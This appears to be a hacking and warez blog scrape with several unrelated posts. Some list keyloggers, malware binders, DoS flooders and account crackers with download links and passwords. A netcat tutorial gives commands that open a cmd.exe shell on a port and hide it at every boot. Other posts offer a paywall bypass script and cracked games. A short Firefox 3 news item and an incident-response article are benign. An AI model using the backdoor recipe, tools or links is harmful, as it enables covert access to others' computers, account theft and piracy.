VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0

Download Them Here -
http://rapidshare.com/files/66349484/Tools_Set.rar


101 Hacker Programs 2007

AIO

rtsp://realaudio.rferl.org/ss/2003/Haag/12/camo25.rm


ANONIMITY

Jap

BINDER&PACKER

ees binder v1.0
NT Packer v2.1
NakedBind v1.0
Aspack 2.1
F.B.I. Binder
AFX Executable Binder PRO
Deception v4.0
coolbind22
Binder v2.1
Deamon Crypt v 2.0
AmkoJoiner
MultiBinder v1.4.1
MicroJoiner v1.7
Pretator v1.6
YAB Binder v 2.0

BRUTER

WebCrackv4.0
BrutuS
Crack FTP
FTP Brute Hacker
phpbb bruteforcer
PhpBB pass extractor
phpBB Cracker
Email Cracker
FTP Brute Forcer

EXPLOIT COLLECTION

10377 Exploit
SMF ShoutBox Xss & Html Inj
SMF Ultimate Shoutbox Cookie Disclosure Exploit
Firefox_BuG

FLOOD_DOS

Flowbabeflow
FreeSiteKillerV2.01
webxgrab
Web Attacker ENG
TheRapist - DoS Attacker
HybridFlood2
Anti-russ 3.0
Http Bomber v1.001b
Sprut
DoS_5
etherflood
DoSAttacker
phpBB Dos
phpBB Attacker
Ping Attack
Site Nuke
Divine Intervention
UC Forum Spammer
Inferno Nuker
Multiple Site FlooD

GOOGLE HACKING

Alt-GooGle
Google Version 1.2
Google H4ck3r
GooLink

KEYLOGGERS

Elgolf 1.0 Beta
ESK KeyLogger
Glog Keylogger
HermanAgent
IKlogger0.1

MESSENGER

MSN Extreme 3.0
winks,moods,muggins,weemees and meegos + Installer
MSN Messenger Account Cracker v2.0
Hotmail Email Hacker
Hotmail HAcker Gold
HotmailHack
yahooUltraCracker
MSN Spy Lite v1.0
Yahoo Hack !
SH Yahoo Pass Sender 1.1
Yahoo Password Decoder

Download Them Here -
http://rapidshare.com/files/68446502/XxxPa..._2007-part1.rar
http://rapidshare.com/files/68446425/XxxPa..._2007-part2.rar
Password : XxxPass_DJ_haselking

Underground Hacking Tools - 2007 - AIO

http://rapidshare.com/files/58544177/UnderG.Hacking2007.part1.rar
http://rapidshare.com/files/58543606/Under...g2007.part2.rar
password: TuxX_under260907:


Best Of Network Tools 2007 AIO Plus Bootable PE

Includes:

Winternals ERD 2005
Paragon NTFS Rescue Kit
Damn Small Linux Live
FreeBSD Recovery Console
MS Dos 7.1
Programs with Super PE 2007
X-Netstat 5.5
Ethereal
Etoollz
Proactive Windows Security Explorer
Vstat
smsniff
IPShifter
Superscan 4
Advanced Admin Tools
Sam Inside ( Can show as Hacking tool to some AVs.)
@Stake LC5.05 live
netscan
MISBO Network monitor
VanDyke Secure CRT
TCP View
Extfs Anywhere
Acronis TrueImage 10
Adaware SE
Acrobat reader 7
Firefox
Thnderbird
WinVNC Server
WinVNC Client
WinHex Forensic Edition
UltraIso 8
Ontrack Easy recovery 6
R-Studio 3.0 Network Edition
Ashampoo burning Studio 6
WinImage
TomaHawk PDF
Everest 2006
Regedit PE
Acronis Disk Director Suite 10.0
Acronis Disk Director Server 10.0
Acronis TrueImage Enterprise Server 9.1
Ranish Partition Manager
Symantec Norton Partition Magic 8.05
PC Tools & Data Recovery
AIDA Hardware Diagnostic Tool
System Memory Tester
HDD Integrity Verifier
HDD Regenerator
RecoverSoft Data Rescue PC
McAfee CleanBoot SP1
Recovery Console Environment
Winternals Administrator Pak 2006
Winternals ERD Commander 2005 v5.0
Winternals Recovery Manager Boot Client
Winternals Defrag Manager Boot Client
O&O BlueCons XXL Administrator\'s Suite
Paragon NTFS Linux Rescue KIT
DamnSmall Live-Linux CD/DVD (Mini Knoppix)
FreeBSD Emergency Console (RIP Rescue KIT)
Customized Micosoft DOS 7.1.0
MSDOS tools and multimedia player
Program installers on Autorum Menu
Best Networking Toosls of 2007
Acunetix Vulnerability Scanner 4
Bluetooth Net Auditor 1.3.5
Capturix NETworks 2007 V.5.03
Deski Network Inventory 5.5.3
Global Network Inventory 1.4.0
AIM Monitor Sniffer 3.0
ICQ Monitor Sniffer 3.0
ICQ Monitor Sniffer 3.0
IMMonitor AIM Spy 2.0
IMMonitor MSN Spy 2.0
IMM Yahoo Messenger Spy 2.0
MSN Messenger Monitor Sniffer 3.2
Yahoo Messenger monitor Sniffer 3.2
Network Monitor DE 3.2.1
LANguard Network Scanner 8.0.2
LANsurveyor 9 Enterprise
LANserveyer 9 Full
Net Transport 2.4.2.366
SoftPerfect Network Analyzer 2.5
Netshare Watcher 1.3.3
Netstat Agent 1.7
Nettools 4.5.74
Network management Suite 6.6.11
Orion Netflow traffic Analyzer
Packet tracer 4.1 By Cisco Systems
WirelessMon 2.0.1013
NetRanger 3.1
Network Stumbler 4.0
Boson Router Simulator 6R2
CCNA Router Simulator 4.0
PIX Firewall Sim SWF Tutorials
Security Administrator 11.3
SolarWinds Engineers Toolset 9.0
Orion NetFlow Traffic Analyzer 2.1
Orion Performance Monitor SLX
Wireless Network Ignition 2.0
Wireshark .99.5
Retina Security Scanner 5.09
NSauditor Security Auditor 1.6.2.0
Superscan 4.0
Iris Network Traffic Analyzer 4.0
Lanspy 2.0
Advanced packet Sniffer 2.0

Firefox 3 Released On June 17 !

Firefox 3 Released On June 17 !
Firefox 3 Released On June 17 !



Mozilla has set June 17 as the official release day for Firefox 3. The introduction of the new browser marks the beginning of a race for the title of the fastest browser on the market. With more than one million people already pledged to download Firefox 3 on the first day of its release, Firefox 3 could set a Guinness World Record as the most downloaded software with the first 24 hours of launch. Mozilla has set next Tuesday, June 17, as the official release day for the upgraded Firefox 3 browser, following months of beta testing and release candidates that have been publicly available to users over the past few weeks. Firefox 3 will be shipped for both Mac and Windows on the same day.

Firefox 3 has already won critical acclaim for its reliability and noticeable performance improvements. It Besides code optimization, Firefox 3 brings numerous new features, including one-click bookmarking and tag support in bookmarks, smart location bar, the ability to save and restore browser sessions, smart zoom that enlarges all web page content (not just text) and significantly improved protection against phishing attacks and malware. Mozilla claims that Firefox 3 has 15,000 tweaks and enhancements when compared to Firefox 2. The official release of Firefox appears to be also launching the beginning the battle for the fastest browser on the market. The JavaScript engine seems to be the primary battlefield for now, as the scripting interpreter optimization directly translates to user-visible speed gains in Web 2.0 sites and Web applications that run faster and show more a responsive user interface.

Download It From Here -
www.Mozilla.com/Firefox

NETCAT TUTORIAL

NETCAT TUTORIAL
NETCAT TUTORIAL

Setting up and Connecting to a "target" computer

First off make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running unix or windows.

To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.

Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "nc 192.168.1.1 10002", this will connect you to your "target's" computer.
(I have not tested this on linux, I have only backdoored windows so I am not positive these commands work properly"

Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "netcat 192.168.1.1 10002", this will connect you to your "target's" computer.


-L Tells netcat to not close and wait for a connection
-p Tells netcat which port to listen on
-d Tells netcat to detach from the process we want it to run
-e Tells netcat which program to run after the port is connected



Transferring files through netcat

To send a file through net cat enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be recieved through netcat.
Enter this in a konsole on the "attacking" computer "netcat 192.168.1.1 1234
Running netcat on startup hidden

Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
Now everytime the computer boots netcat will start hidden.

A website tells u if your computer ports are hacked or not

A website tells u if your computer ports are hacked or not
Check if Ur Ports are Hacked or NOT

info:Port Scan
This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.
A Closed port indicates that the port is reachable but there is no program currently accepting connections there.
If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time and if u are secured after the test ends tells u

Test complete.
No open ports were found

http://probe.hackerwatch.org/probe/probe.asp

Check it out

See solutions on Experts-exchange

See solutions on Experts-exchange
See solutions on Experts-Exchange!

Experts-Exchange (EE)
, founded in 1996, is a collaboration platform for information technology professionals, designed to address specific areas of situation-based knowledge. It's an online "ask an expert" site for computer related questions. The free access is limited (see below) while fee-based premium service is available without such limitations.

Experts-Exchange uses a patented operation mode in which users are awarded with points for answering questions asked by other users. This results in a competition for obtaining more points. Experts who obtain a certain level of points each month are given free access to all features of the web site, known as premium services. Such services are also available by payment.


But You can Now View their solutions For FREE !!-
  1. First download firefox if you dont have it. Download Firefox
  2. Now install addon: Download Grease Monkey Addon For FireFox
  3. Install this script for grease monkey:Download Expert Exchange Script
  4. Now go to experts-exchange and you should see all the posts!

Lego Indiana Jones RELOADED

Lego Indiana Jones  RELOADED
Lego Indiana Jones RELOADED



Download - (Rapidshare Links)
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part01.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part02.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part03.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part04.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part05.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part06.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part07.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part08.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part09.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part10.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part11.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part12.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part13.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part14.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part15.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part16.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part17.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part18.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part19.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part20.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part21.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part22.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part23.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part24.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part25.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part26.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part27.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part28.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part29.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part30.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part31.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part32.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part33.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part34.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part35.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part36.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part37.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part38.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part39.rar
Lego_Indiana_Jones_-RELOADED_by_xtreme55.part40.rar

PROPER CRACK ONLY - ViTALiTY: lijpv.rar

Password: rslinks.org

Stronghold Crusader Extreme

Stronghold Crusader Extreme
Stronghold Crusader Extreme



Info

Stronghold Crusader Extreme takes the addictive Crusader gameplay to a new level. Featuring massive battles, new outposts and tactical powers to master, Extreme carries on from where Crusader left off. The all new Extreme trail will provide a stiff challenge to any hardened Crusader player. For those new to Crusader, the original game has been provided too, in an updated form and with all the previously released limited edition content, such as the second crusader trail and all 8 new AI opponents.

Operating System: Windows 98SE/ME/2000/XP/Vista
Processor: Pentium® III 500 mhz (1 ghz Recommend)
Memory: 128MB (256MB recommended for multiplayer)
Hard Drive: 850MB
Video: 4MB DirectX 8.1 Compatible
Sound: DirectX 8.1 Compatible
DVD Drive: Required
Modem: 56k (for Internet Play)

DOWNLOAD - (RAPIDSHARE)

http://rapidshare.com/files/121423986/Stronghold_Crusader_Extreme_up_by_Poldek.part01.rar
http://rapidshare.com/files/121424718/Stronghold_Crusader_Extreme_up_by_Poldek.part02.rar
http://rapidshare.com/files/121425459/Stronghold_Crusader_Extreme_up_by_Poldek.part03.rar
http://rapidshare.com/files/121426185/Stronghold_Crusader_Extreme_up_by_Poldek.part04.rar
http://rapidshare.com/files/121426876/Stronghold_Crusader_Extreme_up_by_Poldek.part05.rar
http://rapidshare.com/files/121427629/Stronghold_Crusader_Extreme_up_by_Poldek.part06.rar
http://rapidshare.com/files/121428276/Stronghold_Crusader_Extreme_up_by_Poldek.part07.rar
http://rapidshare.com/files/121428952/Stronghold_Crusader_Extreme_up_by_Poldek.part08.rar
http://rapidshare.com/files/121429433/Stronghold_Crusader_Extreme_up_by_Poldek.part09.rar

Password - paradisewarez.com

WHAT TO DO WHEN U R HACKED !!!

WHAT TO DO WHEN U R HACKED !!!
WHAT TO DO WHEN U R HACKED !!!

What should you do in the first five minutes after you discover your system has been hacked? Sitting at your desk, you notice some odd activity in a log while you're looking into a user problem. The more you step through it, the more you are convinced that something is just not right. Your heart skips a beat when you realise that the system has been hacked. At this point, you enter a stage of shock as you ask yourself, "How could this happen?" and "What do I do now?"

Although you'll find plenty of advice on how to keep your systems from being hacked, there are relatively few articles that will help you sort things out in the aftermath of an attack. So for the next three weeks, I'll present a series of articles that will explain what you should do in the first five minutes, in the first hour, and in the first week after you've discovered that an interloper has compromised your systems. This article will focus on the most immediate actions you must take to secure your system: evaluate, communicate, and disconnect.


Evaluate:
The first question that you must answer after an attack (or preferably before) is what your objectives are. In most cases, the objectives are simple: prevent further intrusion and resolve the problem. However, in some cases, you will want to be able to positively identify the intruder and, in others, you will be focused on figuring out which vulnerability the hacker exploited.


Identify the intruder:
It may be necessary to positively identify the intruder so that you can refer the matter to the police for further investigation and possible prosecution. Of course, this is not the most expedient way to get the systems back online and prevent further infection. Identifying intruders can be difficult, particularly if they have covered their tracks well. Despite Hollywood's portrayal of hackers easily being traced, someone who is routing traffic through several systems is not only difficult to find, but might be - in all practical terms - impossible to track down.


Identify the vulnerability:
Another approach that some organisations take is to try to identify the specific vulnerability exploited. The thinking is that you want to patch the specific hole that allowed this intruder to gain access. By and large, this approaches the problem from a suboptimal perspective. A far better strategy is to attempt to identify all vulnerabilities and prevent any intruder from gaining access to your systems, rather than focusing on the one vulnerability this particular hacker exploited. Many of today's security assessment tools will allow you to quickly test and resolve all vulnerabilities.


Return systems to operation:
If this is the first time you have been attacked, you may find it simpler to forgo trying to pinpoint the intruder or the specific vulnerability that was exploited. In general, it is unlikely that you will be able to easily generate the logs you might need to target the origin of the intrusion.

Patching the vulnerabilities and returning systems to operation as soon as possible is the most straightforward approach. It reduces your risk and allows you to fortify your defences without worrying about the intruder continuing to take advantage of your systems.


Plan ahead:
In many cases, organisations determine their course of action prior to an attack. But in an equal number of cases, organisations must make this their first order of business after an attack. In addition to determining your specific goals after an attack, you should consider executing a disaster recovery plan, if one exists for your organisation. Depending on the severity of the situation, it may make sense to treat the situation as if the data centre had been destroyed.

The one unique complication to activating a disaster recovery plan for an organisation is that it is typically centred on a known event with a known time. But with an intrusion into your network, you may not know exactly when the system was first compromised. This can complicate the recovery process because it may not be clear what set of backups should be restored for each system. Further complicating matters is the fact that some systems may have been compromised before others, so it may be necessary to repeat the restoration process several times while trying to determine when the first intrusion occurred and on which system.


Communicate:
Once you have decided on your approach, you need to communicate to upper management what is happening - or what you suspect is happening. This is perhaps the most difficult step and, because of that, it is one that is often skipped or delayed. But despite the potential for internal political problems, it is important to let business leadership understand what is happening so that everyone can plan for the steps required to resolve the problem. It will also give business leadership an opportunity to reaffirm the goal for problem resolution, whether that goal is to go after the intruder, target the vulnerability, or simply solve the problem as quickly as possible.

You should also communicate with your IT peers about the problem. You need everyone on the team to look for suspicious activity to ensure that the network is not further compromised. To that end, the more professionals involved who are aware of the problem, the more likely it is that nothing will slip through the cracks and be missed.

Conversely, you should not communicate with your users that you have detected an intrusion. An employee may have caused the breach, either by providing a password to a friend with the intention of allowing a breach or through something more innocent. It is a good idea to hold off on notifying employees until the HR department can communicate the company policy along with the message.

Finally, if you have a security infrastructure partner, communicate with it immediately that you have a potential situation. Even if you have only engaged the organisation in the past to perform a security audit, you should call it to indicate that you suspect that you have a problem. The intent here is not at this point to ask for help but rather to inform the partner so that it can be prepared to assist if necessary.


Disconnect:
If you are not planning on attempting to identify the intruder or the vulnerability, you should disconnect the system or the entire internal network from the Internet as soon as possible. This prevents the intruder from working against you as you try to clean up the mess and also prevents further infections or data loss while you work on the systems.

One of the downsides of disconnecting is that people who want to use the system internally and externally will be unable to do so until the problem is resolved. This can exert substantial internal pressure to take shortcuts to get the systems back up again. But the natural desire to reconnect systems before a thorough evaluation of their status has been conducted is ill advised and typically leads to repeated intrusions while the problems with each of the servers are identified and resolved one-by-one.

The decision to disconnect the entire organisation from the Internet or to disconnect just one system or a few systems is a difficult call, particularly in the first five minutes. You will not have had time to evaluate which, if any, other systems have been compromised, so it is possible that removing a single system from the Internet may not resolve the problem. On the other hand, you may want the organisation to continue to function with as little disruption as possible.

Ultimately, the decision comes down to one of risk tolerance. How much risk is the organisation willing to accept to avoid some downtime? In most organisations, the risk of potential intruders greatly outweighs the desire to maintain availability of all systems. In other words, most organisations agree that it is important to disconnect from the Internet immediately so that the systems can be checked for signs of intrusion without the possibility of intruders attempting to cover their tracks.


Conclusion:
The first few minutes after you discover an attack are likely to be stressful and confused, so it's important to have a plan of action in place before it happens. When you realise you've been attacked, make sure you identify your objectives in resolving the situation, communicate the situation promptly to business leadership and peers, and determine whether the problem requires you to disconnect one or more systems from the Internet. Deciding how to react to an attack is tricky, at best. The actions you take (or don't take) can have a huge impact on your organisation - and on your reputation. However, following a plan for controlling the situation can make things less chaotic and start you down the right path to get things back on track.